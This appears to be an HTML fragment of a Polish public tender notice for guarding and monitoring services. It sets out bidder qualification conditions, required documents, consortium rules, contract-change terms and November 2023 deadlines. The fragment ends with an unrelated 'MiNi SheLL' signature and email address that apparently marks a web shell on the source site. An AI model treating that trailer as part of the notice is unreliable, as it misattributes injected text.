2021r. poz. 1995 z póżn. zm)<br/>c) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>	d) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek na poziomie minimalnym, jeżeli wykaże, że:<br/>a) dla części I wykonał co najmniej 1 usługę odpowiadającą swoim rodzajem usługom stanowiącym przedmiot zamówienia tj. ochronę fizyczną osób i mienia wraz z monitoringiem, o wartości minimum 54.500,00 zł <br/>b) dla części II wykonał co najmniej 1 usługę odpowiadającą swoim rodzajem usługom stanowiącym przedmiot zamówienia tj. ochronę fizyczną osób i mienia wraz z monitoringiem, o wartości minimum 61.000,00 zł<br/>c) dla części III wykonał co najmniej 1 usługę odpowiadającą swoim rodzajem usługom stanowiącym przedmiot zamówienia tj. ochronę fizyczną osób i mienia wraz z monitoringiem, o wartości minimum 65.500,00 zł<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych przez Wykonawcę w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) Wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Okresy wyrażone w latach lub miesiącach, o których mowa powyżej, liczy się wstecz od dnia w którym upływa termin składania ofert. Wzór wykazu usług stanowi Załącznik nr 5 do SWZ; Jeżeli wykonawca powołuje się na doświadczenie <br/>w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wykaz, o którym mowa powyżej dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/><br/>Wzór Wykazu usług, stanowiący Załącznik nr 5 do SWZ przekazany zostanie Wykonawcy, którego oferta zostanie najwyżej oceniona, w postaci elektronicznej wraz z wezwaniem do złożenia dokumentów na podstawie art. 274 ust.1 do ustawy Pzp. <br/><br/>b) Koncesja - Wykonawca musi posiadać uprawnienia do wykonywania działalności polegającej na ochronie osób i mienia zgodnie z przepisami ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (t.j. Dz.U. z 2021 r. poz. 1995 z późn zm).<br/><br/>UWAGA: <br/>1. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli: <br/> 1. może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 pzp dane umożliwiające dostęp do tych środków; <br/> 2. podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w art. 125 ustawy pzp.<br/><br/>2. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/><br/>3. W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu warunków, o których mowa w rozdz. X. pkt I. ppkt 3 składa przynajmniej jeden z Wykonawców lub wszyscy wykonawcy złożą oświadczenia lub wspólne oświadczenie, że łącznie spełniają te warunki.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta (w oryg) składana jest pod rygorem nieważności w f. Elektr. lub w postaci elektr. opatrzonej kw. podpisem elektr., podpisem zaufanym lub podpisem os. Ofertę należy sporządzić na formularzu, stanowiącym Zał. nr 1 do nin. SWZ.<br/> 2. Wykaz osób w f. elektr. lub w postaci elektr. opatrzonej kw. podpisem elektr., podpisem zaufanym lub podpisem os., które będą uczestniczyć w wyk. Zam. (w oryginale), składany w celu oceny ofert w ramach kryterium „doś. os. wyznaczonych do realizacji zam., stanowiący Zał. nr 6 do nin. SWZ.<br/> 3. Oświadczenie o spełnianiu warunków udziału w postęp. (w oryginale) w zakresie wskaz. w Roz. VIII pkt 2b i 2d SWZ – Zał. nr 2 do SWZ. Ośw. to stanowi dow. Potw. spełnianie warunków udziału w postęp. na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dow., wskazane w Roz. X pkt II do SWZ. Oś., o którym mowa powyżej, składa (wraz z ofertą) oddzielnie :<br/>- każdy z Wyk. wspólnie ubiegających się o zam. W takim przypadku ośw. Potw. brak podstaw wyklucz. Wyk. oraz speł. Warun. udziału <br/>w postęp. w zakresie, w jakim każdy z wyk. wykazuje spełnianie warunków udziału <br/>w postęp.;<br/>- podmiot udostęp. zasoby, na którego potencjał powołuje się Wyk. celem potwier. spełniania warunków udziału w postęp. W takim przypadku ośw. Potw. brak podst. wyklucz. Wyk. oraz speł. warunków udziału w postęp. w zakresie, w jakim podmiot udost.swoje zasoby Wyk.<br/> 4. Oświadczenie o niepodleganiu wykluczeniu (w oryginale) – na Za. nr 3 w zakresie wskazanym w Roz. IX SWZ. Ośw. to stanowi dow. Potwier. brak podst. wyklucz. w postęp. na dzień skład. ofert, tymczasowo zastęp. wymagane podmiotowe śr. dow., w Roz. X pkt II do SWZ. Ośw., o którym mowa pow. wraz z ofertą składa oddzielnie: <br/>- każdy z Wyk. wspólnie ubieg. się o zam. W takim przypadku oś. Potwier.brak podst.wykluczenia wyk. oraz spełnianie warun. udziału <br/>w postęp. w zakresie, w jakim każdy z wyk. wykazuje spełnianie warunków udziału <br/>w postęp.; <br/>- podmiot udostęp. zasoby, na którego potencjał powołuje się Wyk. celem potwier. Speł. warunków udziału w postęp. W takim przypadku ośw. Potw. brak pods. wykluczenia wyk. oraz speł. warunków udziału w postęp. w zakresie, w jakim podmiot udostępnia swoje zasoby Wyk. <br/> 5. Upoważnienie (pełnomocnictwo) lub inny dok., potwier. Umocow. do reprezent. Wyk. (podpisania oferty), o ile nie wynika ono z dok. Rejestr. Wyk. Powyższy zapis stosuje się odpowiednio do os. działającej w imieniu wyk. wspólnie ubiegających się o udzielenie zam. oraz do osoby działającej w imieniu podmiotu udostęp. zasoby Wyk.<br/> 2. Pełnomocnictwo (w oryginale) do reprezent. Wyk. ubiegających się wspólnie (konsorcja, spółki cywilne) o przedmiotowe zam., określające zakres udzielonego pełnomocnictwa (pełnomocnik winien być powołany przez wszystkich Wyk. ubiegających się wspólnie o zamówienie). <br/> 3. Zobowiązanie podmiotu udostępniającego zasoby (w oryginale) (lub inny środek dowodowy) potwierdzający, że stosunek łączący Wyk. z podmiotami udostęp. zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności: zakres zasobów podmiotu udostęp. zasoby przy wyk. Zam., czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wyk. polega w odniesieniu do warunków udziału w postępowaniu dotyczących kw. Zaw., wykształcenia lub dośw., zrealizuje usługi, których wskazane zdolności dotyczą – według wzoru stanowiącego załącznik nr 4 do SWZ<br/> 4. Oświadczenie (w oryginale), z którego wynika, które usługi wykonają poszczególni wyk. w przypadku Wyk. wspólnie ubiegających się o udzielenie zam. <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wyk., którzy wykonają usługi, do realizacji których te zdolności są wymagane. Zam. dopuszcza złożenie tego oświadczenia na formularzu ofertowym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielnie zamówienia publicznego. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie <br/>z pełnomocnikiem.<br/>2. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o którym mowa w art. 112 ust. 2 pkt 2 ustawy pzp, zostanie spełniony, jeżeli co najmniej jeden <br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>3. W odniesieniu do warunków dotyczący wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegających się o udzielenie zamówienia mogą polegać na zdolnościach tych <br/>z Wykonawców, którzy wykonują usługi, do realizacji których te zdolności są wymagane.<br/>4. W przypadku, o którym mowa w pkt. 2 i 3, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie z którego wynika, które usługi wykonują poszczególni Wykonawcy. Zamawiający dopuszcza złożenie tego oświadczenia na formularzu ofertowym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, określone zostały w załączniku nr 7 do SWZ<br/> 2. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w oparciu art.454 i art.455 w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami zawartymi w załączniku nr 7 do SWZ.<br/> 3. Przed zawarciem umowy należy dopełnić formalności, które zostały wskazane w pkt. XXIII SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-10 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://mops-czeladz.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-10 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com